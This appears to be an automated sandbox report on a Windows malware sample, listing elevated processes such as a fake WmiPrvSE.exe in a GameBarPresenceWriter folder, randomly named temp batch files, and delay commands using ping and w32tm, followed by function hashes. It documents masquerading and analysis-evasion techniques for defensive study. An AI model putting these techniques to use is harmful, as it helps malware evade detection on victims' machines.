Target ID:	44
Start time:	20:43:19
Start date:	26/10/2024
Path:	C:\Windows\System32\wbem\WMIADAP.exe
Wow64 process (32bit):	false
Commandline:	wmiadap.exe /F /T /R
Imagebase:	0x7ff671e90000
File size:	182'272 bytes
MD5 hash:	1BFFABBD200C850E6346820E92B915DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	20:43:20
Start date:	26/10/2024
Path:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Imagebase:	0xe30000
File size:	3'408'384 bytes
MD5 hash:	0AD0B4A4A549230E090D712B5521BD96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	20:43:24
Start date:	26/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9O9rrJCHDg.bat"
Imagebase:	0x7ff7f2b30000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	20:43:24
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	20:43:24
Start date:	26/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6e2890000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	20:43:24
Start date:	26/10/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff79a6e0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	20:43:33
Start date:	26/10/2024
Path:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Imagebase:	0x2c0000
File size:	3'408'384 bytes
MD5 hash:	0AD0B4A4A549230E090D712B5521BD96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	20:43:37
Start date:	26/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BBca1gliPd.bat"
Imagebase:	0x7ff7f2b30000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	20:43:37
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	20:43:37
Start date:	26/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6e2890000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	20:43:38
Start date:	26/10/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff75b810000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	20:43:43
Start date:	26/10/2024
Path:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Imagebase:	0x7d0000
File size:	3'408'384 bytes
MD5 hash:	0AD0B4A4A549230E090D712B5521BD96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	20:43:47
Start date:	26/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BLXo76X4ph.bat"
Imagebase:	0x7ff7f2b30000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	20:43:47
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	95
Start time:	20:45:01
Start date:	26/10/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	4
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9BFD3140 Relevance: 1.8, Strings: 1, Instructions: 561
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A, xrefs: 00007FFD9BFD34F1, 00007FFD9BFD3621, 00007FFD9BFD3746

Memory Dump Source

Source File: 00000000.00000002.1792700831.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bfd0000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-2078354741
Opcode ID: d774756fc31e2246de9cfa4aacb954e5471d64087c53ba9dcc7675ba3ac69438
Instruction ID: 5940142416485353d4bbdfa8daff220f0c7943773dc6507ec37eb41de9059152
Opcode Fuzzy Hash: d774756fc31e2246de9cfa4aacb954e5471d64087c53ba9dcc7675ba3ac69438
Instruction Fuzzy Hash: 5902B331B0D95D4FEBA8EFA884B66B877E1EF98300F150779D40DC32E2DE2969468741

Function 00007FFD9B880D70 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783181073.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 801813eb6a1323540d577cedd34e438c4210f7031d4c25eac87ab05c89ec3846
Instruction ID: 54d698f7621e8b25fb048785bf6a3a2e31ab73d786428f76f4b062e289dc937e
Opcode Fuzzy Hash: 801813eb6a1323540d577cedd34e438c4210f7031d4c25eac87ab05c89ec3846
Instruction Fuzzy Hash: 6391D171A28A8E8FE79CDB6C88657A97FE1FF99310F4000BAD15AD72D6DF7418028741

Function 00007FFD9BC40E66 Relevance: 1.8, Strings: 1, Instructions: 514
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 00007FFD9BC41107

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: d6e87a9b611a0155cad096f383cbc2836234b0694fdf2be36ada870467092e9a
Instruction ID: 31f7f87a2aedfb414f8bedf39bb1f495eb5586fa6f45a0b2512d661573926536
Opcode Fuzzy Hash: d6e87a9b611a0155cad096f383cbc2836234b0694fdf2be36ada870467092e9a
Instruction Fuzzy Hash: 0FF14430A0DA4A8FD71DDF28D4A19B977E1FF86304B1441BAD489C72ABDE24F9438781

Function 00007FFD9BFD3005 Relevance: 1.8, APIs: 1, Instructions: 259
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1792700831.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bfd0000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21719338aff52c3fe95f031c7cc19559f005dd42751585a6b704e7704f2e02ab
Instruction ID: bb5387ade707dbd1e4871599855113b7eeb42d9dc99ae8f6bae87f8eb7fb0e9a
Opcode Fuzzy Hash: 21719338aff52c3fe95f031c7cc19559f005dd42751585a6b704e7704f2e02ab
Instruction Fuzzy Hash: 40819130608A4D8FEB68DF18D8557F937E1FB59311F04427EE84EC72A2CB75A9458B81

Function 00007FFD9BFD4E71 Relevance: 1.8, APIs: 1, Instructions: 250
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryFullProcessImageNameA.KERNEL32 ref: 00007FFD9BFD5021

Memory Dump Source

Source File: 00000000.00000002.1792700831.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bfd0000_9D7RwuJrth.jbxd

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: 57b9d8b2bb28d67137dd9a600b7558d5746b96c0e65874a7c1ee5e0258e83bf9
Instruction ID: 03ed3dee6ae92a0d5e42cd1ce3c0006b2be728bcc798aaa3ba7426de1b2efe77
Opcode Fuzzy Hash: 57b9d8b2bb28d67137dd9a600b7558d5746b96c0e65874a7c1ee5e0258e83bf9
Instruction Fuzzy Hash: 6671A230608A8D8FDB68DF18D8557F937E1FB59311F04827EE84EC72A2CB75A9458B81

Function 00007FFD9BC4DF48 Relevance: 1.4, Strings: 1, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFD9BC4DFB2

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 12ce97811004ec64832069e7bd65f540ccfb9681e3254452336ade6be00033a9
Instruction ID: 9436e10e00b405213359cc81d0a9e4f225329c37bd67c80825e67073c8b145ee
Opcode Fuzzy Hash: 12ce97811004ec64832069e7bd65f540ccfb9681e3254452336ade6be00033a9
Instruction Fuzzy Hash: 58516071E0964E8FEB69DFA8D4645FCBBB2FF55300F1140BAD01AE7296DA346A01CB50

Function 00007FFD9BC48748 Relevance: 1.4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFD9BC487B2

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: db5dcd999534466850e8ecaa977686c3d20a70ca4ada6a478f18b50e3f87cea5
Instruction ID: 27ae7b21654922068a28ea98a72a76d9fb64f176b3cdc69575604cdc7ec53b38
Opcode Fuzzy Hash: db5dcd999534466850e8ecaa977686c3d20a70ca4ada6a478f18b50e3f87cea5
Instruction Fuzzy Hash: 7B518D30E0954E8FDB59DFA8D8645FDBBB2EF44340F1540BAD01AE7292DE382A01CB50

Function 00007FFD9BC4CA59 Relevance: 1.3, Strings: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#, xrefs: 00007FFD9BC4CAE8

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-3629985089
Opcode ID: 7670fe54b3cc4a1ee973272188aa0892c03a0da51ca08db1642563c63e9818d8
Instruction ID: b1c3c62360a390105ea53e9dc42acd4839e9c2552b2a55b61f3d7ef6ce6cdf39
Opcode Fuzzy Hash: 7670fe54b3cc4a1ee973272188aa0892c03a0da51ca08db1642563c63e9818d8
Instruction Fuzzy Hash: 2031D771F0994E4FEB68DAB858725ADB7D2EF54311F0502B9E05DC31F2ED286A0A4381

Function 00007FFD9BC4B942 Relevance: 1.3, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#, xrefs: 00007FFD9BC4B9EA

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-3629985089
Opcode ID: 94ec374cb8a03102fddd0b9e97211101d4bdbc60a72e0a1184cf096168b32bef
Instruction ID: 830d8022685516ea95b85151c26d7eb54d00d87a190baf84a382d6dec4bb9809
Opcode Fuzzy Hash: 94ec374cb8a03102fddd0b9e97211101d4bdbc60a72e0a1184cf096168b32bef
Instruction Fuzzy Hash: CF21FD34E1591D9FDF98DF68D465AEDB7B1FF68300F0401AAD00EE3291DE35AA418B40

Function 00007FFD9BC489CF Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 451f262436188e3fdb526739778b1992a9406fbdcf490df27d5000a0e3e2ba7b
Instruction ID: 0bddebc37fd6a3ff034d8ddf64b5edd7d59b540f7da577f6e4e9e4a2cc002863
Opcode Fuzzy Hash: 451f262436188e3fdb526739778b1992a9406fbdcf490df27d5000a0e3e2ba7b
Instruction Fuzzy Hash: BCC1023061A54A8FEB1DCF68C4E05B937A2FF55300B6545BDC84B8B69BCA38F681CB40

Function 00007FFD9BC4DA62 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68d7a05776d5dbe87639556497e1c487e6d62a62f85689bb9bb926c260730245
Instruction ID: ecb89f8f2b7cab660dd4437b3529c5e2a955d9c96c2b7f7b744aa1b192154cf7
Opcode Fuzzy Hash: 68d7a05776d5dbe87639556497e1c487e6d62a62f85689bb9bb926c260730245
Instruction Fuzzy Hash: 94C11730B09A4A8FD759EF68C0606B8B7A2FF55310F4541BDD04EC7A96CB68BE51C790

Function 00007FFD9BC48262 Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c20c05ee0428e530d54cc75457915adc084e2fb185430afb96595ba064c7f94
Instruction ID: 5e2e64f2968183ac03f14d10e0793fd79f53adcf1f9e8e355105af165d52f88b
Opcode Fuzzy Hash: 8c20c05ee0428e530d54cc75457915adc084e2fb185430afb96595ba064c7f94
Instruction Fuzzy Hash: D5C10630B0DA4A8FE759DF68C0606A8BBA2FF55340F4541BDC04EC7A96DB28BA51C781

Function 00007FFD9BC466E0 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f5d849588d009f2fcf5a664722e813e19e8ec5d2ac266774543b7b95ad9b02f
Instruction ID: e22fca994409e548962231887a2b3af437565ac2ecf1f78c60f08c45e5a15065
Opcode Fuzzy Hash: 0f5d849588d009f2fcf5a664722e813e19e8ec5d2ac266774543b7b95ad9b02f
Instruction Fuzzy Hash: 7691C130B18A1D8FDB58DF58C8959B9B3E2FF55314B1541B9D04EC72AACA35ED42CB40

Function 00007FFD9BC489AF Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74809cd3f7b8f202a768ef2e86a56ec2973d7b395bfddc4054955e9a9d2ab5e1
Instruction ID: 0537c63493292e501e9f4b296596bb5f8df09414a9ada87771a6945e89fedfa7
Opcode Fuzzy Hash: 74809cd3f7b8f202a768ef2e86a56ec2973d7b395bfddc4054955e9a9d2ab5e1
Instruction Fuzzy Hash: 3DB1D27061A6468FEB5DCF18C4E05B537A2FF49314B5542BDC84A8B69BC738F982CB81

Function 00007FFD9BC4132F Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bb098dfb98c0b8e50a4a56c3247168a7cc94e147dbd6fa1952655b080328797
Instruction ID: 2e25b0f6ffaa17f4b82efcebddb6ee25318cde3dda8faa2fae4a9ad7d319aa4e
Opcode Fuzzy Hash: 7bb098dfb98c0b8e50a4a56c3247168a7cc94e147dbd6fa1952655b080328797
Instruction Fuzzy Hash: 14812522B0F79A5FF7298BB888B14F83B61FF5231471A02B7C0D58F4A7DD187A468651

Function 00007FFD9BC477A6 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c6984abdbd46362bee8c681316dfb7ca714ca555cbbbd82555d650f77b82328
Instruction ID: 2f2527d8a3ebb91be21fa4e764307954cd2510ef314c168a6f17570be10457a5
Opcode Fuzzy Hash: 7c6984abdbd46362bee8c681316dfb7ca714ca555cbbbd82555d650f77b82328
Instruction Fuzzy Hash: 6E81E231A0EA4A4FE3399E7894215BD77E3EF95310B16057FD09EC35A2DE28BB028751

Function 00007FFD9BC4CF96 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06932298ae24f8326a26e89cb34ae25e80584b56c1a755c646e3f52e354afeee
Instruction ID: 1870d7c6a8900dc93033ef07070de6d9aaaff051f2e09b70684c6c1bb7c52d33
Opcode Fuzzy Hash: 06932298ae24f8326a26e89cb34ae25e80584b56c1a755c646e3f52e354afeee
Instruction Fuzzy Hash: 41812031B0E64A4FE338AF78946157D77E2EF86361B16057ED88EC71A3D928AF024741

Function 00007FFD9BC4B109 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9dd383a399e394df27cb5a9ebf8922d6a074ab38ea501ea64c9e125516351d6
Instruction ID: a5b4ab8aebd7e88c2684efe9791b4f2feff46a26959ce54a6a41f6457040f7c2
Opcode Fuzzy Hash: d9dd383a399e394df27cb5a9ebf8922d6a074ab38ea501ea64c9e125516351d6
Instruction Fuzzy Hash: DB71F631A0E44E4FE778DE6884666BC37D2FF49311B1602B9D49EC75B2DD18AB078781

Function 00007FFD9BC45BF9 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b1cc3d9f11ad8b628be65b7eb167d02eaea3a24cf6c1f3e366950a0bdbb180b
Instruction ID: 38cc3c23611051ebfe3bd62eea983645d8512cfb27a16e7aed174cb78375c9f5
Opcode Fuzzy Hash: 2b1cc3d9f11ad8b628be65b7eb167d02eaea3a24cf6c1f3e366950a0bdbb180b
Instruction Fuzzy Hash: 2071E231A0E44D4FE778DF68886A5BD37D2FF48310B1602B9D49EC75E2DA18BB068781

Function 00007FFD9BC499F1 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 016a48107e0d6796e9d078c1182cd5f7869842bb10338180390eaedfabcc353b
Instruction ID: ed8e842ab51887e8136ed4c05c5cf3a2bab396bdf44d68cc8e4094d04f4bfc60
Opcode Fuzzy Hash: 016a48107e0d6796e9d078c1182cd5f7869842bb10338180390eaedfabcc353b
Instruction Fuzzy Hash: D8810730A0EB1A8FD374CF65D0A857977E2FF44310B11057DC48EC7AA2CAA9BA42C741

Function 00007FFD9BC4ACF2 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 143e14e67023824a51003e03aa963de60a12eb6b5c98a05af03f1acb0712508a
Instruction ID: 763cd1958dd691ec32c96ec3734a254572adfab5eecd0d2872033b20ef9e6aed
Opcode Fuzzy Hash: 143e14e67023824a51003e03aa963de60a12eb6b5c98a05af03f1acb0712508a
Instruction Fuzzy Hash: F5510B61A0E6AE5FD71AEBB8A8B04ED7B71EF05318B0901F7D09DCB1D3ED1825068751

Function 00007FFD9BC4BCCB Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ff792351ba83e467ebb0cf0c248e52e0a600f43410ff436680b3599b3e6d9b
Instruction ID: 58d39a5212902f6b89db95eb092358a01b61df734f39a4c2b24113e8ba34e516
Opcode Fuzzy Hash: e0ff792351ba83e467ebb0cf0c248e52e0a600f43410ff436680b3599b3e6d9b
Instruction Fuzzy Hash: 5B517130E19A4E8EEB65DFB48860ABCBBB1FF55300F5504B9D01ED71EADE286A41C741

Function 00007FFD9BC464CB Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fb75012f4f1e8d897339e54602798fcbc1ab625a97a87e30dab75d7c6d75b35
Instruction ID: d7f125462f3eb5abc7a558b64033e4fdab96d6662cc3ca2340f40681a3decd2c
Opcode Fuzzy Hash: 3fb75012f4f1e8d897339e54602798fcbc1ab625a97a87e30dab75d7c6d75b35
Instruction Fuzzy Hash: 6351CD30A19A4E8FDB65DFB8C4645AC7BB2FF05310F1504BAE00AC71AADA386A41C740

Function 00007FFD9BC48D40 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65895cd945c6c8a54a8210cb8838f3e5ca9c8baf2f12a93b8647fa476f1ed2d0
Instruction ID: 99c7ea6d4c5ef7710ce0fbb941584b45794b100c9071f9573fd3c6c8fcac4c8f
Opcode Fuzzy Hash: 65895cd945c6c8a54a8210cb8838f3e5ca9c8baf2f12a93b8647fa476f1ed2d0
Instruction Fuzzy Hash: 0251E830A0D95E4FEBB8DB6888647F877A2FF64300F1541B9C04ED3196DE386B859B41

Function 00007FFD9B88090D Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783181073.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 053337cd1c025d93309e9f52b1657b15fd67babee61997f2bc7baa25601ca7bd
Instruction ID: df8e1c924d8e0445136ab82ca4016181a6159301f17c39c1275847a951c0ee0f
Opcode Fuzzy Hash: 053337cd1c025d93309e9f52b1657b15fd67babee61997f2bc7baa25601ca7bd
Instruction Fuzzy Hash: DF414B12B0DAA91FD319B3BC74AA5F97B90DF49325B0404FFD05ECB1E7DD2868428285

Function 00007FFD9BC4A515 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c90695aa894af6a3ecee4bde8c7a924a6cad7272a04a1081b2fc86b0b2b2c0bd
Instruction ID: f3249e22a2b72c70ad644eaf3eff7ea170b30609b0b9a4bd943db4e1d5dd43a9
Opcode Fuzzy Hash: c90695aa894af6a3ecee4bde8c7a924a6cad7272a04a1081b2fc86b0b2b2c0bd
